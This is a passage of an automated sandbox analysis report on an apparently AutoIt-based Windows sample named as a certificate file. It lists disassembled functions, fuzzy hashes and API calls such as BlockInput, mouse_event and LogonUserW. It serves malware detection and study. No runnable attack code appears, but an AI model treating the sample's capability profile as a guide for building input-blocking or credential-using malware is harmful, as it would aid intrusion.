                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 674341424-0
                                                                              • Opcode ID: c07aec30712fae3268c1faabfb26cc5fe47eb2ccacd71654882126cedd324d9b
                                                                              • Instruction ID: 6e06c9cae48389ce00e384e6af814c9818fdf240df569e1c181551424fe285de
                                                                              • Opcode Fuzzy Hash: c07aec30712fae3268c1faabfb26cc5fe47eb2ccacd71654882126cedd324d9b
                                                                              • Instruction Fuzzy Hash: 772266715083119FD724DF14C894BAEB7E4FF84310F10892DFAAA9B291DB79E945CB82
                                                                              Function 007E038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f423544dea087a74329dcc553a3529d50a2b5e8156fea4b14b64fc8430227a2e
                                                                              • Instruction ID: c30ec4421f3e2ec2b0d1726b98c102d4ea723819bf920d8dae0f4bd3270c1c2f
                                                                              • Opcode Fuzzy Hash: f423544dea087a74329dcc553a3529d50a2b5e8156fea4b14b64fc8430227a2e
                                                                              • Instruction Fuzzy Hash: 55B1E225D2AF414ED7239639883133AB65CBFBB2D5F91D71BFC1A74D62EB2185838180
                                                                              Function 007FB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 007FB6DF
                                                                                • Part of subcall function 007D344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007FBDC3,00000000,?,?,?,?,007FBF70,00000000,?), ref: 007D3453
                                                                                • Part of subcall function 007D344A: __aulldiv.LIBCMT ref: 007D3473
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID:
                                                                              • API String ID: 2893107130-0
                                                                              • Opcode ID: 18a9809e372790180ce623520fc99e828f2d8147ca849c5777478f6cfe0b6a92
                                                                              • Instruction ID: dd3b9b17f763e86f4986ef5377d2bbf6a2d4894be0ded53d042dac1ff958fc07
                                                                              • Opcode Fuzzy Hash: 18a9809e372790180ce623520fc99e828f2d8147ca849c5777478f6cfe0b6a92
                                                                              • Instruction Fuzzy Hash: 9221A272634510CBC729CF38D881A62B7E1EB95310B248E6DE1E5CB2C0CB78F945DB54
                                                                              Function 00806AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 00806ACA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              • Opcode ID: c1fa80f8c468a321423e9e17ce9fb811f4358dd1e1097156437473eefb9d6c5f
                                                                              • Instruction ID: 5e3f17b3ef063d6018a50fe5669118d5a47a96648b11f3fb5feb78a5be904209
                                                                              • Opcode Fuzzy Hash: c1fa80f8c468a321423e9e17ce9fb811f4358dd1e1097156437473eefb9d6c5f
                                                                              • Instruction Fuzzy Hash: 65E01235300214AFC750EB69D809E96B7ECFFB4761B04841AE945D7291EAB4E8148BA0
                                                                              Function 007F74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007F750A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              • Opcode ID: 9f885c1d230abdee8a1a8bae89b81512f238e052dbb1eed1e9c763d5d081ae9b
                                                                              • Instruction ID: ad10467b1d7c140e6f8c910e3e17ef5d67d835164fd7466cce7537ae2b9407ff
                                                                              • Opcode Fuzzy Hash: 9f885c1d230abdee8a1a8bae89b81512f238e052dbb1eed1e9c763d5d081ae9b
                                                                              • Instruction Fuzzy Hash: 42D06CA526C64E69E82D4724AC1BFB61A08B340782FD48589B7229A2C0B8A86D25E031
                                                                              Function 007EB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007EAD3E), ref: 007EB124
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: ebd71d6ce325559589680ebd418d31f0c3f63cbc5404bf7a9763eee18744d634
                                                                              • Instruction ID: 88d848f4e2fef3221faf71ada9fcc2b3342297e762689a236b528a0a1e4de8ad
                                                                              • Opcode Fuzzy Hash: ebd71d6ce325559589680ebd418d31f0c3f63cbc5404bf7a9763eee18744d634
                                                                              • Instruction Fuzzy Hash: B8D09E321A4A4EAEDF029FA4ED06EAE3F6AEB04B01F448511FA15D50A1C775D531AB50
                                                                              Function 0082B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: d54492e61d4b9c96b255924eb602dd87b46b952fcf71a03cb8eddd972ece2163
                                                                              • Instruction ID: c2b9a579e02a61aff982ab93042a186614db05a7922f43334ead51bea29b850d
                                                                              • Opcode Fuzzy Hash: d54492e61d4b9c96b255924eb602dd87b46b952fcf71a03cb8eddd972ece2163
                                                                              • Instruction Fuzzy Hash: F9C04CB140051DDFC755DBC0D9449EEB7BCBB04705F105491A105F1110D7709B859B72
                                                                              Function 007D8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007D818F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: b9c29be62f3be2df2e420e13f5edf9326be91a30ea57a2dade291fa99cd86709
                                                                              • Instruction ID: 3553d5d937cb29ae91cd3544baa91a3dca520121443ff296526e701c84ce0199
                                                                              • Opcode Fuzzy Hash: b9c29be62f3be2df2e420e13f5edf9326be91a30ea57a2dade291fa99cd86709
                                                                              • Instruction Fuzzy Hash: A0A0113000030CAB8F002B82FC088883F2CFA802A0B008020F80C00220AB22A8208A82
                                                                              Function 007BE3B0 Relevance: .5, Instructions: 540COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d7f857992e0ea3743eec83cc98971c0066f3cbb3629c8aab3c72ccfbfe1c6046
                                                                              • Instruction ID: 28d46a5c54434190dd40dd8cc2a864469ad89f01b8b528d17ea4f62eb0ea80bc
                                                                              • Opcode Fuzzy Hash: d7f857992e0ea3743eec83cc98971c0066f3cbb3629c8aab3c72ccfbfe1c6046
                                                                              • Instruction Fuzzy Hash: 4A22AA70A0421ACFDB24DF58C484BEEB7B1FF18314F248169E95A9B351E739AD81CB91
                                                                              Function 007B93F0 Relevance: .5, Instructions: 531COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3517b84c3cffb6199b54b56e1a136ef2418b5d78e038633ea3f92d3930ab3af6
                                                                              • Instruction ID: dd350d9c1145360ae32b4a093e049d03a2d2f978801febb87203ee54356e7ea7
                                                                              • Opcode Fuzzy Hash: 3517b84c3cffb6199b54b56e1a136ef2418b5d78e038633ea3f92d3930ab3af6
                                                                              • Instruction Fuzzy Hash: FE127C70A00219EFDF14DFA8D985AEEB7F5FF48300F108569E916E7250EB39A960CB50
                                                                              Function 007BAF50 Relevance: .5, Instructions: 514COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3728558374-0
                                                                              • Opcode ID: 2a628eadda273261efe2044953d2860528dcff01427257c48e0befb7a8170130
                                                                              • Instruction ID: 1192c5fa87a08692726749b8c0d9e7559c0795c86937e24044ac44d8201f5260
                                                                              • Opcode Fuzzy Hash: 2a628eadda273261efe2044953d2860528dcff01427257c48e0befb7a8170130
                                                                              • Instruction Fuzzy Hash: 4002C3B0A00119EFDF14DF68D985BAEBBB5FF48300F108069E806DB255EB39DA55CB91
                                                                              Function 007D02A4 Relevance: .3, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                              • Instruction ID: c348153359127be6a4b962a173c5595f90317e80c62c86ad797f85bc67bf185c
                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                              • Instruction Fuzzy Hash: 38C1E7322051970ADF2D463AC434A3EFBB15E927B171A176ED8B3CB5D1EF28C524D660
                                                                              Function 007D06D9 Relevance: .3, Instructions: 341COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                              • Instruction ID: db9bb7ee0858f8c6defb8c478e51f0a0db3e2d5ffc8207fb1eea1bcf93261ebd
                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                              • Instruction Fuzzy Hash: 9EC1053220519709DF2D463AC43463EBBB15EA2BB170A236ED4B3CF2D5EF28D524D660
                                                                              Function 007CFA57 Relevance: .3, Instructions: 323COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction ID: 466141137a12780d743bb6e6bcb077f4160de8b0e8e7d25581c29e7015a4e397
                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction Fuzzy Hash: 61C1A43220509709DF2D463AC474E3EFBA25AA2BB131A177DD8B3CB5D5EF28C564D620
                                                                              Function 0080A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 0080A2FE
                                                                              • DeleteObject.GDI32(00000000), ref: 0080A310
                                                                              • DestroyWindow.USER32 ref: 0080A31E
                                                                              • GetDesktopWindow.USER32 ref: 0080A338
                                                                              • GetWindowRect.USER32(00000000), ref: 0080A33F
                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0080A480
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0080A490
                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A4D8
                                                                              • GetClientRect.USER32(00000000,?), ref: 0080A4E4
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0080A51E
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A540
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A553
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A55E
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0080A567
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A576
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0080A57F
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A586
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0080A591
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A5A3
                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0083D9BC,00000000), ref: 0080A5B9
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0080A5C9
                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0080A5EF
                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0080A60E
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A630
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A81D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              • Opcode ID: 93f1248f008fc01908e89cc9063e3d0e10388e4366376fda30376876937cae5e
                                                                              • Instruction ID: b57f1ec4b8131ed631acc541116a009135e2f8d4120018ef7017f954f96a555b
                                                                              • Opcode Fuzzy Hash: 93f1248f008fc01908e89cc9063e3d0e10388e4366376fda30376876937cae5e
                                                                              • Instruction Fuzzy Hash: 1F024875900208EFDB14DFA8DD89EAEBBB9FB48310F048558F915EB2A1D774AD41CB60
                                                                              Function 0081D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0081D2DB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0081D30C
                                                                              • GetSysColor.USER32(0000000F), ref: 0081D318
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0081D332
                                                                              • SelectObject.GDI32(?,00000000), ref: 0081D341
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0081D36C
                                                                              • GetSysColor.USER32(00000010), ref: 0081D374
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0081D37B
                                                                              • FrameRect.USER32(?,?,00000000), ref: 0081D38A
                                                                              • DeleteObject.GDI32(00000000), ref: 0081D391
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0081D3DC
                                                                              • FillRect.USER32(?,?,00000000), ref: 0081D40E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0081D439
                                                                                • Part of subcall function 0081D575: GetSysColor.USER32(00000012), ref: 0081D5AE
                                                                                • Part of subcall function 0081D575: SetTextColor.GDI32(?,?), ref: 0081D5B2
                                                                                • Part of subcall function 0081D575: GetSysColorBrush.USER32(0000000F), ref: 0081D5C8
                                                                                • Part of subcall function 0081D575: GetSysColor.USER32(0000000F), ref: 0081D5D3
                                                                                • Part of subcall function 0081D575: GetSysColor.USER32(00000011), ref: 0081D5F0
                                                                                • Part of subcall function 0081D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0081D5FE
                                                                                • Part of subcall function 0081D575: SelectObject.GDI32(?,00000000), ref: 0081D60F
                                                                                • Part of subcall function 0081D575: SetBkColor.GDI32(?,00000000), ref: 0081D618
                                                                                • Part of subcall function 0081D575: SelectObject.GDI32(?,?), ref: 0081D625
                                                                                • Part of subcall function 0081D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0081D644
                                                                                • Part of subcall function 0081D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0081D65B
                                                                                • Part of subcall function 0081D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0081D670
                                                                                • Part of subcall function 0081D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081D698
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: 80dbc4aea8a7cc7a61023a5297ee67eae232c405ae49ade35529509f11d0441d
                                                                              • Instruction ID: 8582253a2734b19a1d6ff8e59fe32ef365e7ef5af470b072b5b7f37b042d32e5
                                                                              • Opcode Fuzzy Hash: 80dbc4aea8a7cc7a61023a5297ee67eae232c405ae49ade35529509f11d0441d
                                                                              • Instruction Fuzzy Hash: 65916D72408305EFDB109F64EC48EABBBA9FF85325F100E19F966961A0D771D984CB52
